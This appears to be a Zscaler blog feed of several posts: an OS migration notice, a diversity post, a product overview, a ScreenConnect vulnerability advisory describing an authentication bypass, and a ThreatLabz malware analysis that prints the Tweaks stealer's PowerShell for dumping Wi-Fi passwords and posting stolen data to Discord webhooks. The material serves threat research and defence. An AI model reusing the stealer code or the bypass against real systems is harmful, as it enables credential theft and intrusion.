ブログフィード
https://www.zscaler.jp/
Zscalerのブログ — クラウド セキュリティに関する最新のニュースや見解jaZscaler Selects Red Hat Enterprise Linux 9 (RHEL 9) as Next-Gen Private Access Operating System
https://www.zscaler.jp/blogs/product-insights/zscaler-selects-red-hat-enterprise-linux-9-rhel-9-next-gen-private-access
What’s new?On June 30, CentOS 7 will reach end of life, requiring migrations in many software stacks and server environments. In advance of this, Zscaler has selected Red Hat Enterprise Linux 9 as the next-generation operating system for Zscaler Private AccessTM (ZPA). RHEL 9 is the modern enterprise equivalent to CentOS 7, backed by Red Hat, and supported through 2032. This continues ZPA’s proven stability and resiliency on open source Linux platforms and builds on 10 years of maturity on Red Hat Enterprise Linux-based derivatives. What’s more, this transition can be done with no impact to operations or user access.
When will it be released?Pre-built images for all ZPA-supported platforms are targeted for release in May 2024. All ZPA images, including containers, hypervisors, and public cloud offerings, will be replaced with RHEL 9. This is the recommended deployment for all future App Connector and Private Service Edge components, and customers should begin migration immediately on release. For customers that manage their own Red Hat base images, Zscaler is targeting the end of April 2024 for release of RHEL 9-native Red Hat Package Manager (RPM) and repositories.
New Enterprise OS Without Licensing FeesTo ensure an excellent experience for our customers, Zscaler will provide operating system licenses for all RHEL 9 images on supported platforms. This continues our commitment to secure, open source platforms without imposing additional licensing costs on our customers.
We also understand the need for control over security baseline images that meet your security posture and will continue to provide RPM options through support of RHEL 8 and RHEL 9. These software packages are bring-your-own-license (BYOL) and won’t conflict with any existing Red Hat enterprise license agreements you may hold.
CentOS 7 End of LifeThe CentOS Project and Red Hat will be ending the final extended support for CentOS 7 and RHEL 7 on June 30, 2024. While we aim to provide RHEL 9 support in advance of this date (and do currently support RHEL 8 with RPMs), we recognize that the transition is a large undertaking, affecting all enterprise data centers, and operations and will take time to transition over to new operating systems and software.
In light of this, we want to provide ample time to migrate while considering the security implications of continuing to support an obsolete operating system. Zscaler will support existing CentOS 7 deployments, RPMs, and distribution servers until December 24, 2024. We are confident our ZPA architecture and design uniquely position us to continue to support CentOS 7 past its expiry date. See End-of-Support for CentOS 7.x, RHEL 7.x, and Oracle Linux 7.x for more details on CentOS EOL and the ZPA white paper for architecture and security design.
While we have ample controls in place and the utmost confidence, there is always inherent risk in using an unsupported server operating system. Zscaler will not provide backported operating system patches during this transition, but will maintain the ZPA software and supporting security libraries.
Lightweight and Container Orchestration ReadyFollowing Zscaler’s cloud-native and best-in-class zero trust approach, ZPA infrastructure components are designed to be lightweight, container ready, and quickly deployed. This allows App Connector and Private Service Edge the benefit of being scaled and migrated without worry for previously deployed instances or operating system upgrade paths. For these reasons, the migration best practice is to deploy new App Connectors and Private Service Edges. Zscaler does not provide direct operating system upgrade paths for currently deployed infrastructure components.
In further support of this, we offer Open Container Initiative (OCI) compatible images for Docker CE, Podman, and Red Hat OpenShift Platform. These images as well as the public cloud marketplaces are fully ready for autoscale groups, supporting quick scale up and scale down.
Migration and Support ExcellenceZscaler understands your concerns and will fully support you throughout this transition process. Our Technical Account Managers, Support Engineers, and Professional Services are ready to address all concerns related to migration. If a temporary increase of App Connector or PSE limits are needed in your environment to complete migration, there will be no extra licensing costs.
Below are the steps to help you replace CentOS 7 instances with RHEL 9. The enrollment and provisioning of new App Connectors and Private Service Edges can be automated in a few steps using Terraform (infrastructure-as-code) or Container Orchestration to simplify deployment further.
App Connector Migration Steps:Create new App Connector Groups and provisioning keys for each location (Note: do not reuse existing provisioning keys as it will add the new RHEL 9 App Connectors to the old App Connector Groups. Mixing different host OS and Zscaler software versions in a single group is not supported.)
Update the App Connector group's version profile to "default - el9" so that it's able to receive the proper binary updates
(This version profile can be set as default for the tenant once all connectors are moved to RHEL 9)
Deploy new VMs using the upcoming RHEL 9 OVAs and newly created provisioning keys (templates can be used)
Add the new App Connector Groups to each respective Server Group
(Optional) In the UI, disable the app connector groups five minutes prior to the regional off-hours maintenance window to allow connections to gradually drain down
During regional off-hours, remove the CentOS 7 App Connector Groups
Private Service Edge Migration Steps:Create new Service Edge Groups and provisioning keys for each location (Note: do not reuse existing provisioning keys as it will add the new RHEL 9 PSEs to the old Service Edge Groups. Mixing different host OS and Zscaler software versions in a single group is not supported.)
Update the Service Edge Group's version profile to "Default - el9" so that it's able to receive the proper binary updates
(This version profile can be set as default for the tenant once all connectors and PSEs are moved to RHEL 9)
Deploy new VMs using the upcoming RHEL 9 OVAs and the newly created provisioning keys (templates can be used)
Add trusted networks and enable “publicly accessible” (if applicable) on the new Service Edge Groups
(Optional) In the UI, disable the Service Edge Groups 15 minutes prior to the regional off-hours maintenance window to allow connections to gradually drain down
During regional off hours, remove trusted networks and disable public access (if applicable) on CentOS 7 Service Edge Groups
Please reach out to your respective support representatives for further assistance and information as needed.
For more information:
Zscaler Private Access Website
Zscaler Private Access | Zero Trust Network Access (ZTNA)
End-of-Support for CentOS 7.x, RHEL 7.x, and Oracle Linux 7.x
ZPA App Connector Software by Platform
ZPA Private Service Edge Software by Platform
Mon, 18 3月 2024 15:34:32 -0700Shefali Chinnihttps://www.zscaler.jp/blogs/product-insights/zscaler-selects-red-hat-enterprise-linux-9-rhel-9-next-gen-private-accessTweaks Stealer Targets Roblox Users Through YouTube and Discord
https://www.zscaler.jp/blogs/security-research/tweaks-stealer-targets-roblox-users-through-youtube-and-discord
IntroductionZscaler’s ThreatLabz recently discovered a new campaign distributing an infostealer called Tweaks (aka Tweaker) that targets Roblox users. Attackers are exploiting popular platforms, like YouTube and Discord, to distribute Tweaks to Roblox users, capitalizing on the ability of legitimate platforms to evade detection by web filter block lists that typically block known malicious servers. Attackers share malicious files disguised as Frames Per Second (FPS) optimization packages with users and, in turn, users infect their own systems with Tweaks malware.Given that 45% of Roblox users are under 13, it’s probable that the malware being circulated could extend to parents’ systems. Furthermore, with the proliferation of remote work, there’s a possibility of this malware infiltrating corporate devices (surreptitiously) used by children of employees. Not only does a successful infection leave Roblox account data vulnerable, but it may also compromise the data and device.In this blog, we analyze the Tweaks attack campaign and its technical characteristics.Key TakeawaysThe Tweaks or Tweaker stealer masquerades as a tool to enhance frames per second (FPS) for Roblox users that steals data in the background without the user’s knowledge.The attackers leverage YouTube by enticing users to watch videos on "How to increase FPS" that contain links to their Discord groups. Once users join these groups, the attackers provide them with links to malicious files disguised as game tweaks and modifications.The stealer is Powershell-based and exfiltrates sensitive data like user information, location, Wi-Fi profiles, and passwords, Roblox IDs, and in-game currency details.Once sensitive data is obtained, it is sent via a Discord webhook to the attacker-controlled server. ThreatLabz researchers discovered multiple attackers copying a “free” version of Tweaks and using it to sell “paid” versions. BackgroundWhy is FPS appealing to Roblox users?The Roblox game boasts a massive user base consisting of millions of players worldwide. Roblox offers a diverse range of games and experiences, allowing players to explore virtual worlds and engage in various activities. One feature that attracts Roblox players is the desire for an enhanced gaming experience, including improved FPS. Higher FPS can result in smoother gameplay, making it an appealing prospect for players seeking optimal performance. It’s not unusual for gamers to download optimization tools from popular platforms like YouTube and Discord to increase their hardware performance – making it more likely that a gamer might unintentionally download the Tweaks malware.Gaming sees more cyber attacksRoblox's significant user base of 71.5 million daily active users makes it an attractive target for cyber attackers. In addition, a 2024 report shows that the gaming industry is now worth around $455.27 billion. In light of these trends, it is not surprising that hackers looking to exploit and monetize sensitive data are targeting Roblox users, who, like many other gamers, store a wealth of data in their gaming accountsCampaign AnalysisDuring our investigation, we discovered several YouTube channels and videos offering tutorials on how to improve FPS in Roblox. In these videos, Roblox players were instructed to disable their antivirus software to ensure the smooth operation of a “PC optimizer” without encountering any issues. In reality, this tactic is used to make a user’s system easier to infect with malware.In the description boxes of these videos, links to the attacker’s corresponding Discord groups are provided. Figure 1 below shows a Tweaks YouTube channel, the Discord group links provided to the user, and the initial Tweaks interface that appears when users download the initial file.Figure 1: An example of a Tweaks YouTube channel, links to Discord groups, and the Tweaks interface.Once they enter the attacker-controlled Discord channels, users encounter both free and paid versions of FPS optimization files. Our initial analysis revealed that both versions were identical, utilizing the same BAT file. Consequently, the choice between the free and paid versions had no impact on the outcome. The only distinction was that users who opted for the paid version experienced a small financial loss and had their data stolen.Presently, attackers entice new users by offering a free version with limited optimization features, alongside a paid version that promises more advanced optimization capabilities.Once users download the files, they unknowingly install the Tweaks malware, which not only infects their system but also puts their data at risk of being stolen. From the user's perspective, everything seems normal as the Tweaks malware genuinely enhances FPS optimization. This deceptive behavior makes users less suspicious of the malware since it appears to be fulfilling its intended purpose. Figure 2 below shows both the paid and free version of Tweaks on the Discord channel.Figure 2: An example of the Discord group advertising FPS optimization files to distribute Tweaks malware.Case Study 1After joining the Discord group, Roblox gamers are directed to download a malicious BAT file from a Mediafire link, leading to a malware infection.Once the malware is executed, the BAT file presents users with the Tweaks menu interface, while simultaneously stealing their information in the background. The stolen data is then sent via Discord webhooks to an attacker-controlled server.The figure below illustrates the Tweaks attack chain.Figure 3: Illustrates the Tweaks attack chain involving a Discord group supplying a BAT file.Case Study 2Upon further investigation, we discovered that Tweaks was being sold on Discord. Two versions are available for purchase: the Beta Menu and the Paid Menu.The malware author converted the BAT file into an EXE file and then inserted the EXE file into a password-protected ZIP archive. This new iteration employs the same stealing capabilities as the BAT file discussed in Case Study 1. The figure below illustrates the Tweaks attack chain for Case Study 2. Figure 4: This diagram illustrates the Tweaks attack chain involving a Discord group supplying an EXE file inside of a ZIP archive.CapabilitiesThe Tweaks malware can steal the following data:User’s Wi-Fi profiles and passwordsUUID and usernamesUser locationIP address and timeSystem informationRoblox ID and in-game currency informationTechnical AnalysisThe following analysis covers the technical characteristics of Case Study 1 and Case Study 2 for Tweaks.Case Study 11. BAT files establish webhooks: To start, once the user downloads the BAT file and executes it, the malware establishes the necessary webhook URLs using the Powershell commands below:"$payload = [PSCustomObject]@{ embeds = @($embedObject) };" ^
"Invoke-RestMethod -Uri $webHookUrl -Body ($payload | ConvertTo-Json -Depth 4) -Method Post -ContentType 'application/json';"The file embeds the pilfered data within the webhooks, ensuring its transmission to the attackers.2. Wi-Fi profile and password theft: The malware steals Wi-Fi profiles and passwords with the Powershell command below:
“$wifiProfiles = (netsh wlan show profiles | Select-String 'All User Profile' | ForEach-Object { $_.ToString().Split(':')[1].Trim() } | ForEach-Object { $ssid = $_; $pwd = (netsh wlan show profile name=$ssid key=clear) | Select-String 'Key Content' | ForEach-Object { $_.ToString().Split(':')[1].Trim() }; if ($pwd) { Write-Output ('SSID: ' + $ssid + ', Password: ' + $pwd) } else { Write-Output 'SSID: ' + $ssid + ', Password: NO PASSWORDS FOUND' } });”The code sample above is also shown in Figure 5 below.Figure 5: Tweaks code showing the webhook setup and Wi-Fi profiles/password theft.3. Using WMI to harvest system information: The malware leverages Windows Management Instrumentation (WMI) to collect UUIDs and usernames along with the user's location including the following fields: country, region, city, and approximate location. The Powershell code looks like this:"$hwid = (Get-WmiObject win32_computersystemproduct | Select-Object -ExpandProperty UUID);" ^
"$pcUsername = $env:USERNAME;"
"$ipInfo = Invoke-RestMethod -Uri 'http://ipinfo.io/json';" ^
"$country = $ipInfo.country;" ^
"$region = $ipInfo.region;" ^
"$city = $ipInfo.city;" ^
"$location = $ipInfo.loc;"The code sample above, along with the user’s location and username, are shown in Figure 6 below.Figure 6: Tweaks code showing the theft of UUID, user name, and the user’s location.4. Additional data theft: In addition, the malware collects IP information like private and public IP addresses, the current time, system information, Roblox ID, and currency information.The former values are collected using the following Powershell code:"$publicIp = (Invoke-RestMethod -Uri 'https://api64.ipify.org?format=json').ip;" ^
"$privateIp = (Test-Connection -ComputerName $env:COMPUTERNAME -Count 1).IPV4Address.IPAddressToString;" ^
"$currentTime = Get-Date -Format 'yyyy-MM-dd HH:mm:ss';" ^
"$description = 'Public IP: ' + $publicIp + ' - Private IP: ' + $privateIp + ' - Current Time: ' + $currentTime;"The latter values are collected with the code shown in Figure 7 below.Figure 7: Tweaks code showing the collection of system information, Roblox ID, and in-game currency details.Case Study 2In Case Study 2, when the user follows the link mentioned in the Discord group, a ZIP archive is downloaded, which contains an EXE file. Once the user executes the EXE file, it displays the Tweaks menu interface similar to Case Study 1.The malware creates a folder in the Temp directory, C:\Users\<user_name>\AppData\Local\Temp\F9B9.tmp, with a random name and creates a BAT file in that directory as shown in the screenshot below.Figure 8: The process tree of the Tweaks EXE file.The source code of the dropped BAT file is similar to the BAT file used in Case Study 1 and its functionality is the same.ConclusionAttackers are leveraging popular community platforms, like YouTube and Discord, to distribute Tweaks malware and steal sensitive data. They capitalize on the legitimate reputation of YouTube and Discord communities to trick victims into inadvertently downloading (and in some cases paying) for their own malware infections. To mitigate these risks, Roblox users (and all gamers) should prioritize using legitimate apps from reputable and secure sources, thereby avoiding unknown or unverified application origins. By adhering to these precautions, gamers can enhance their cybersecurity defenses and protect themselves from potential malware threats.Zscaler Sandbox CoverageDuring our investigation of this campaign, the Zscaler Sandbox played a crucial role in analyzing the behavior of various files. Because of the sandbox analysis, threat scores and specific MITRE ATT&CK techniques triggered were identified. Figure 9: Sandbox reportWin32.PWS.TWEAKS BAT.PWS.TWEAKSMITRE ATT&CK TechniquesIDTechnique NameT1566PhishingT1082System Information DiscoveryT1064ScriptingT1010Application Windows DiscoveryT1047Windows Management InstrumentationT1016.002Wi-Fi DiscoveryT1016System Network Configuration DiscoveryT1059Command and Scripting InterpreterT1018Remote System DiscoveryT1562Disable or Modify ToolsIndicators Of Compromise (IOCs)MD5File Typee35864892846be3462139f9534d5ddb5EXE0e8d32259b06ab01cd04587b1ae5d0c1BAT Webhook URLhttps://discord[.]com/api/webhooks/1193562861071511683/Y3e960iiIYKeT-2hq8c0VDuprdKTD3u5F1f0AKfPQnQde8CoXnK2HzVoVGb6mBgXTsc6https://discordapp[.]com/api/webhooks/1197341553404956752/xoPYo_fCPQGLsUIBrreFz05R9JuX_K4L96ResReZ7oLtj1za6QSYlCuMnTB8raMpVqCw YouTube Channelshttps://www.youtube[.]com/@cartistweaks/videoshttps://www.youtube[.]com/@fraidtweaks Tue, 12 3月 2024 14:52:56 -0700Preet Kamalhttps://www.zscaler.jp/blogs/security-research/tweaks-stealer-targets-roblox-users-through-youtube-and-discordTo Help Build a More Inclusive Future, Develop Yourself
https://www.zscaler.jp/blogs/zscaler-life/help-build-more-inclusive-future-develop-yourself
An organization's success comes down to its people, and fostering diversity in the workforce amplifies a business's ability to navigate complex challenges. Women bring unique skills and perspectives that contribute significantly to a company's effectiveness. From innovation and effective communication to adept problem-solving and inspiring leadership, women enrich the professional landscape with a diverse array of talents.
I am proud to be the global president of WIZE (Women in Zscaler Engage), Zscaler’s women-led employee resource group. This week we kicked off our month-long celebration for Women’s History Month and International Women’s Day.
We are continuing to engage in tough conversations both regionally and globally with our allies to elevate women’s voices. There is still a great amount of work that must be done both today and for future generations of women and girls.
As Kavitha Mariappan, EVP, Customer Experience & Transformation and WIZE executive sponsor said in her opening remarks at our IWD celebration, “You all are role models to so many in our industry. This is important. Studies show Gen Z girls are 20 percent more likely than boys to say they won’t pursue a STEM career because they don’t feel they would be good at it.”
As a woman in tech and mother of five, stats like this push me to expose girls to the importance of STEM and encourage our allies to use their voices. We need everyone involved in this effort!
Dr. Gena Cox joined us for our virtual celebrations to share her valuable insights on spearheading inclusion within the organization and the significance of respect, with an emphasis on those who are underrepresented. Dr. Cox shared her model on how everyone should feel valued, seen and heard.
As I reflected on Dr. Cox’s keynote, I thought about ways I can, and should, be modeling respect in my professional and personal life. What could I do or say to impact someone’s day, life, or career? We all have a voice and platform, we just need to be shown how and when to use it. I am standing up for women’s rights, for equality in the tech industry, and as a mother I will always stand behind my children and seek to positively impact their future. I believe that, in 2024, we are another step closer to creating a more inclusive environment for future generations, and each individual act matters. This doesn’t just mean in our professional careers, it means taking it into our personal lives.
I am invested in myself. I am dedicated to my personal growth and self-improvement to create the best version of myself.
I am invested in my children and my family. As a working mother, I am continuously learning to skillfully balance the demands of my professional career while being active in my childrens’ lives. I am committed to showing each of them that they are valued, heard, seen, and loved.
I am invested in my community. I am passionate about community engagement in my personal and professional lives. I will continue to empower others and reinforce among allies the importance of collaboration through education while leading by example.
Zscaler’s WIZE International Women’s Day celebration also recognized 28 women from around the world with a WIZE Award for their commitment and dedication to making an inclusive workplace through mentorship, community engagement, leadership, going the extra mile, and serving our customers. Thank you to all of our winners and our greater WIZE community for your continued support and efforts to create a safe environment where we can bring our authentic self to work.
We hope you join us in celebrating Women’s History Month and International Women’s Day 2024! To learn more about the amazing women of Zscaler, watch this video and explore the content below:
What to Read Next:
This International Women’s Day, let’s pull up a chair for all of our women colleagues
The ascendency of inclusion: A conversation with Dr. Gena Cox
Celebrating Women at Zscaler:
WIZE Woman of Impact in APJ: Sandra Wang
WIZE Women of Impact: Wendy Bartijn
Sun, 10 3月 2024 17:24:56 -0700Julia Cummingshttps://www.zscaler.jp/blogs/zscaler-life/help-build-more-inclusive-future-develop-yourselfOutpace Attackers with AI-Powered Advanced Threat Protection
https://www.zscaler.jp/blogs/product-insights/outpace-attackers-ai-powered-advanced-threat-protection
Securing access to the internet and applications for any user, device, or workload connecting from anywhere in the world means preventing attacks before they start. Zscaler Advanced Threat Protection (ATP) is a suite of AI-powered cyberthreat and data protection services included with all editions of Zscaler Internet Access (ZIA) that provides always-on defense against complex cyberattacks, including malware, phishing campaigns, and more.
Leveraging real-time AI risk assessments informed by threat intelligence that Zscaler harvests from more than 500 trillion daily signals, ATP stops advanced phishing, command-and-control (C2) attacks, and other tactics before they can impact your organization. In aggregate, Zscaler operates the largest global security cloud across 150 data centers and blocks more than 9 billion threats per day. Additionally, our platform consumes more than 40 industry threat intelligence feeds for further analysis and threat prevention. With ATP you can:
Allow, block, isolate, or alert on web pages based on AI-determined risk scores
Block malicious content, files, botnet, and C2 traffic
Stop phishing, spyware, cryptomining, adware, and webspam
Prevent data loss via IRC or SSH tunneling and C2 traffic
Block cross-site scripting (XSS) and P2P communications to prevent malicious code injection and file downloads
To provide this protection, Zscaler inspects traffic—encrypted or unencrypted—to block attackers’ attempts to compromise your organization. Zscaler ThreatLabz found in 2023 that 86% of threats are now delivered over encrypted channels, underscoring the need to thoroughly inspect all traffic. Enabling protection against these threats takes just a few minutes in ATP in the Zscaler Internet Access management console. This blog will help you better understand the attack tactics ATP prevents on a continuous basis. We recommend you select “Block” for all policy options and set the "Suspicious Content Protection" risk tolerance setting to "Low" in the ATP configuration panel of the ZIA management console.
Prevent web content from compromising your environmentThreat actors routinely embed malicious scripts and applications on legitimate websites they’ve hacked. ATP policy protects your traffic from fraud, unauthorized communication, and other malicious objects and scripts. To bolster your organization's web security, the Zscaler ATP service identifies these objects and prevents them from downloading unwanted files or scripts onto an endpoint device via the user’s browser.
Using multidimensional machine learning models, the ZIA service applies inline AI analysis to examine both a web page URL and its domain to create Page Risk and Domain Risk scores. Given the magnitude of Zscaler’s dataset and threat intelligence inputs, risk scoring is not dependent on specific indicators of compromise (IOCs) or patterns.
Using AI/ML to analyze web pages reveals malicious content including injected scripts, vulnerable ActiveX, and zero-pixel iFrames. The Domain Risk score results from analysis of the contextual data of a domain, including hosting country, domain age, and links to high-risk top-level domains. The Page Risk and Domain Risk scores are then combined to produce a single Page Risk score in real time, which is displayed on a sliding scale.
This risk score is then evaluated against the Page Risk value you set in the ATP configuration setting (as shown below). Zscaler will block users from accessing all web pages with a Page Risk score higher than the value you set. You can set the Page Risk value based on your organization’s risk tolerance.
Disrupt automated botnet communicationA botnet is a group of internet-connected devices, each of which runs one or more bots, or small programs, that are collectively used for service disruption, financial or sensitive information theft via distributed denial-of-service (DDoS) attacks, spam campaigns, or brute-forcing systems. The threat actor controls the botnet using command-and-control software.
Command & Control Servers
An attacker uses a C2 server to send instructions to systems compromised by malware and retrieve stolen data from victim devices. Enabling this ATP policy blocks communication to known C2 servers, which is key to preventing attackers from communicating with malicious software deployed on victims’ devices.
Command & Control Traffic
This refers to botnet traffic that sends or receives commands to and from unknown servers. The Zscaler service examines the content of requests and responses to unknown servers. Enabling this control in the ATP configuration blocks this traffic.
Block malicious downloads and browser exploits
Malicious Content & Sites
Websites that attempt to download dangerous content to the user's browser upon loading a page introduce considerable risk: this content can be downloaded silently, without the user's knowledge or awareness. Malicious content could include exploit kits, compromised websites, and malicious advertising.
Vulnerable ActiveX Controls
An ActiveX control is a software program for Internet Explorer, often referred to as an add-on, that performs specific functionality after a web page loads. Threat actors can use ActiveX controls to masquerade as legitimate software when, in reality, they use them to infiltrate an organization’s environment.
Browser Exploits
Known web browser vulnerabilities can be exploited, including exploits targeting Internet Explorer and Adobe Flash. Despite Adobe sunsetting the browser-based add-on in January 2021, Flash components are still found embedded in systems, some of which may be critical for infrastructure or data center operations.
Foil digital fraud and cryptomining attempts AI-Powered Phishing Detection
Phishing is becoming harder to stop with new tactics, including phishing kits sold on the black market—these kits enable attackers to spin up phishing campaigns and malicious web pages that can be updated in a matter of hours. Phishing pages trick users into submitting their credentials, which attackers use in turn to compromise victims’ accounts.
Phishing attacks remain problematic because even unsophisticated criminals can simply buy kits on the dark web. Threat actors can also update phishing pages more quickly than most security solutions meant to detect and prevent phishing can keep up with. But with Zscaler ATP, you can prevent compromises from patient zero phishing pages inline with advanced AI-based detection.
Known Phishing Sites
Phishing websites mimic legitimate banking and financial sites to fool users into thinking they can safely submit account numbers, passwords, and other personal information, which criminals can then use to steal their money. Enable this policy to prevent users from visiting known phishing sites.
Suspected Phishing Sites
Zscaler can inspect a website’s content for indications that it is a phishing site, and then use AI to stop phishing attack vectors. As part of a highly commoditized attack method, phishing pages can have a lifespan of a few hours, yet most phishing URL feeds lag 24 hours behind—that gap can only be addressed by a capability able to stop both new and unknown phishing attacks.
Spyware Callback
Adware and spyware sites gather users’ information without their knowledge and sell it to advertisers or criminals. When “Spyware Callback” blocking is enabled, Zscaler ATP prevents spyware from calling home and transmitting sensitive user data such as address, date of birth, and credit card information.
Cryptomining
Most organizations block cryptomining traffic to prevent cryptojacking, where malicious scripts or programs secretly use a device to mine cryptocurrency—but this malware also consumes resources and impacts performance of infected machines. Enabling “Block” in ATP’s configuration settings prevents cryptomining entering your environment via user devices.
Known Adware & Spyware Sites
Threat actors stage legitimate-looking websites designed to distribute potentially unwanted applications (PUA). These web requests can be denied based on the reputation of the destination IP or domain name. Choose “Block” in ATP policy configuration to prevent your users from accessing known adware and spyware sites.
Shut down unauthorized communication Unauthorized communication refers to the tactics and tools attackers use to bypass firewalls and proxies, such as IRC tunneling applications and "anonymizer" websites.
IRC Tunneling
Internet Relay Chat (IRC) protocol was created in 1988 to allow real-time text messaging between internet-connected computers. Primarily used in chat rooms (or “channels”), the IRC protocol also supports data transfer as well as server- and client-side commands. While most firewalls block the IRC protocol, they may allow SSH connections. Hackers take advantage of this to tunnel their IRC connections via SSH, bypass firewalls, and exfiltrate data. Enabling this policy option will block IRC traffic from being tunneled over HTTP/S.
SSH Tunneling
SSH tunneling enables sending data with an existing SSH connection, with the traffic tunneled over HTTP/S. While there are legitimate uses for SSH tunnels, bad actors can use them as an evasion technique to exfiltrate data. Zscaler ATP can block this activity.
Anonymizers
Attackers use anonymizer applications to obscure the destination and content they want to access. Anonymizers enable the user to bypass policies that control access to websites and internet resources. Enabling this policy option blocks access to anonymizer sites.
Block cross-site scripting (XSS) and other malicious web requestsCross-site scripting (XSS) is an attack tactic wherein bad actors inject malicious scripts into otherwise trusted websites. XSS attacks occur when a threat actor uses a web app to send malicious code, usually in the form of a client-side script, to a different end user.
Cookie Stealing
Cookie stealing, or session hijacking, occurs when bad actors harvest session cookies from users’ web browsers so they can gain access to sensitive data including valuable personal and financial details they in turn sell on the dark web or use for identity theft. Attackers also use cookies to impersonate a user and log in to their social media accounts.
Potentially Malicious Requests
Variants of XSS requests enable attackers to exploit vulnerabilities in a web application so they can inject malicious code into a website. When other users load a page from the target web server in their browser, the malicious code executes, expanding the attack exponentially.
Prevent compromise via peer-to-peer file sharing P2P programs enable users to easily share files with each other over the internet. While there are legitimate uses of P2P file sharing, these tools are also frequently used to illegally acquire copyrighted or protected content—and the same content files can contain malware embedded within legitimate data or programs.
BitTorrent
The Zscaler service can block the usage of BitTorrent, a communication protocol for decentralized file transfers supported by various client applications. While its usage was once pervasive, global torrent traffic has decreased from a high of 35% in the mid-2000s to just 3% of all global internet traffic in 2022.
Tor
Tor is a P2P anonymizer protocol that obscures the destination and content accessed by a user, enabling them to bypass policies controlling what websites or internet resources they can access. With Zscaler ATP, you can block the usage of the Tor protocol.
Avoid VOIP bandwidth overutilizationWhile convenient for online meetings, video conferencing tools can be bandwidth-intensive. They may also be used to transfer files or other sensitive data. Depending on both your organization's risk tolerance level and overall network performance, you may want to curtail employee or contractor use of Google Hangouts.
Google Hangouts
While VOIP application usage may be encouraged for cost savings over traditional landline-based communications, it’s often associated with high bandwidth usage. Google Hangouts (a.k.a. Google Meet) requires a single video call participant to meet a 3.2 Mbps outbound bandwidth threshold. Inbound bandwidth required starts at 2.6Mbps for two users and expands with additional participants. In Zscaler ATP, you can block Google Hangout usage to conserve bandwidth for other business-critical applications.
Comprehensive, always-on, real-time protection Clearly, there’s a wide swath of protection modern organizations need to fortify their security posture on an ongoing basis. Zscaler Advanced Threat Protection delivers always-on protection against ransomware, zero-day threats, and unknown malware as part of the most comprehensive suite of security capabilities, powered by the world's largest security cloud—all at no extra cost to ZIA customers.
ATP filters and blocks threats directed at ZIA customers and, in combination with Zscaler Firewall and Zscaler Sandbox, provides superior threat prevention thanks to:
A fully integrated suite of AI-powered security services that closes security gaps and reduces risks left by other vendors’ security tools. Zscaler Sandbox detects zero-day malware for future-proof protection while Zscaler Firewall provides IPS and DNS control and filtering of the latest non-web threats.
Real-time threat visibility to stay several steps ahead of threat actors. You can’t wait for another vendor’s tool to finish scheduled scans to determine if you’re secure—that puts your organization at risk. Effective advanced threat protection from Zscaler monitors all your traffic at all times.
Centralized context and correlation that provides the full picture for faster threat detection and prevention. Real-time, predictive cybersecurity measures powered by advanced AI continuously give your IT or security team the ability to outpace attackers.
The ability to inspect 100% of traffic with Zscaler’s security cloud distributed across 150 points of presence worldwide. Operating as a cloud-native proxy, the Zscaler Zero Trust Exchange ensures that every packet from every user, on or off-network, is fully inspected with unlimited capacity—including all TLS/SSL encrypted traffic.
Learn more about how Zscaler prevents encrypted attacks and best practices to stop encrypted threats by securing TLS/SSL traffic: download a copy of the Zscaler ThreatLabz 2023 State of Encrypted Attacks Report.
Mon, 11 3月 2024 07:00:01 -0700Brendon Macaraeghttps://www.zscaler.jp/blogs/product-insights/outpace-attackers-ai-powered-advanced-threat-protectionMultiple Vulnerabilities Found In ConnectWise ScreenConnect
https://www.zscaler.jp/blogs/security-research/multiple-vulnerabilities-found-connectwise-screenconnect
IntroductionOn February 19, 2024, ConnectWise released an advisory disclosing critical vulnerabilities impacting ScreenConnect Remote Monitoring and Management (RMM) software. The first vulnerability, tracked as CVE-2024-1709, allows threat actors to bypass authentication and exploit a second vulnerability, CVE-2024-1708. The second vulnerability is a path traversal flaw that enables attackers to upload a malicious file, potentially leading to Remote Code Execution (RCE) on affected versions of ScreenConnect instances.
The technical details of this vulnerability underscore its easy exploitability, utilizing common tactics, techniques, and procedures (TTPs) that could lead to data exfiltration and lateral movement across compromised instances.
RecommendationsZscaler ThreatLabz strongly recommends on-premises users of ConnectWise ScreenConnect software to promptly upgrade to the latest version, which has crucial fixes to mitigate the vulnerabilities identified as CVE-2024-1709 and CVE-2024-1708.
Affected VersionsThe following versions of ConnectWise ScreenConnect are affected by the vulnerabilities disclosed and should be updated immediately:
ScreenConnect 23.9.7 and prior
BackgroundConnectWise ScreenConnect enables users to manage, connect, and access systems remotely. The remote access solution is available for on-prem and cloud architectures. ConnectWise’s advisory prompted the Cybersecurity & Infrastructure Security Agency (CISA) to add CVE-2024-1709 to their Known Exploited Vulnerabilities Catalog. CVE-2024-1709 earned a critical CVSS score of 10.0, while CVE-2024-1708 received a score of 8.4.
CVE-2024-1709 allows a remote attacker to gain access to systems with admin privileges. Once inside the compromised system, the attacker leverages CVE-2024-1708 to upload malicious files to the compromised system and potentially achieve RCE.
An attacker can exploit these vulnerabilities to:
Access, upload, or modify important files
Steal sensitive information and disrupt critical services
Move laterally on the breached network
How It WorksThe attack sequence begins by sending a malformed HTTP request to the vulnerable ScreenConnect instance. Specifically, this means appending any character to the /SetupWizard.aspx URL (i.e., /SetupWizard.aspx<something>) to gain unauthenticated access to the /SetupWizard.aspx page.
The /SetupWizard.aspx page allows the attacker to create a new user account with administrator privileges, even on a pre-configured instance, without requiring any authentication. This exploit is possible due to a flaw in the SetupWizard.aspx file, responsible for the initial administrator setup and license validation on the instance.
Once inside the system, the attacker uploads a malicious ASHX ScreenConnect extension, packaged in a ZIP archive, to achieve RCE and later obtain a remote web shell. The attack sequence is shown in Figure 1.
Figure 1: A diagram illustrating how an attacker targets a vulnerable ScreenConnect instance.
Exploitation Steps1. Malformed HTTP Request: The attacker launches the attack by sending a malformed HTTP request to the vulnerable ScreenConnect instance as shown below.
Figure 2: An example of a malformed HTTP request targeting CVE-2024-1709.
The figure below shows CVE-2024-1709 exploitation via a 302 redirect to the /SetupWizard.aspx page.
Figure 3: Exploitation of CVE-2024-1709.
2. Arbitrary Admin Account Creation: Upon receiving the malicious request, the ScreenConnect instance processes the request and redirects to the /SetupWizard.aspx page, where the attacker can create an administrator account as shown in Figure 4.
Figure 4: The ScreenConnect page where the attacker can fraudulently create an administrator user account.
The figure below includes XML showing that the attacker was able to successfully create an administrator user account.
Figure 5: ScreenConnect\App_Data\User.xml shows evidence of the attacker-created administrator user account.
3. Malicious Payload Delivery: The attacker uploads a malicious ScreenConnect extension (shown in Figure 6) wrapped in a ZIP archive to the vulnerable instance. This ZIP archive contains an ASHX file designed to exploit CVE-2024-1708 and facilitate RCE on the vulnerable system.
Figure 6: A POST transaction depicting the installation of a malicious extension on a ScreenConnect Instance.
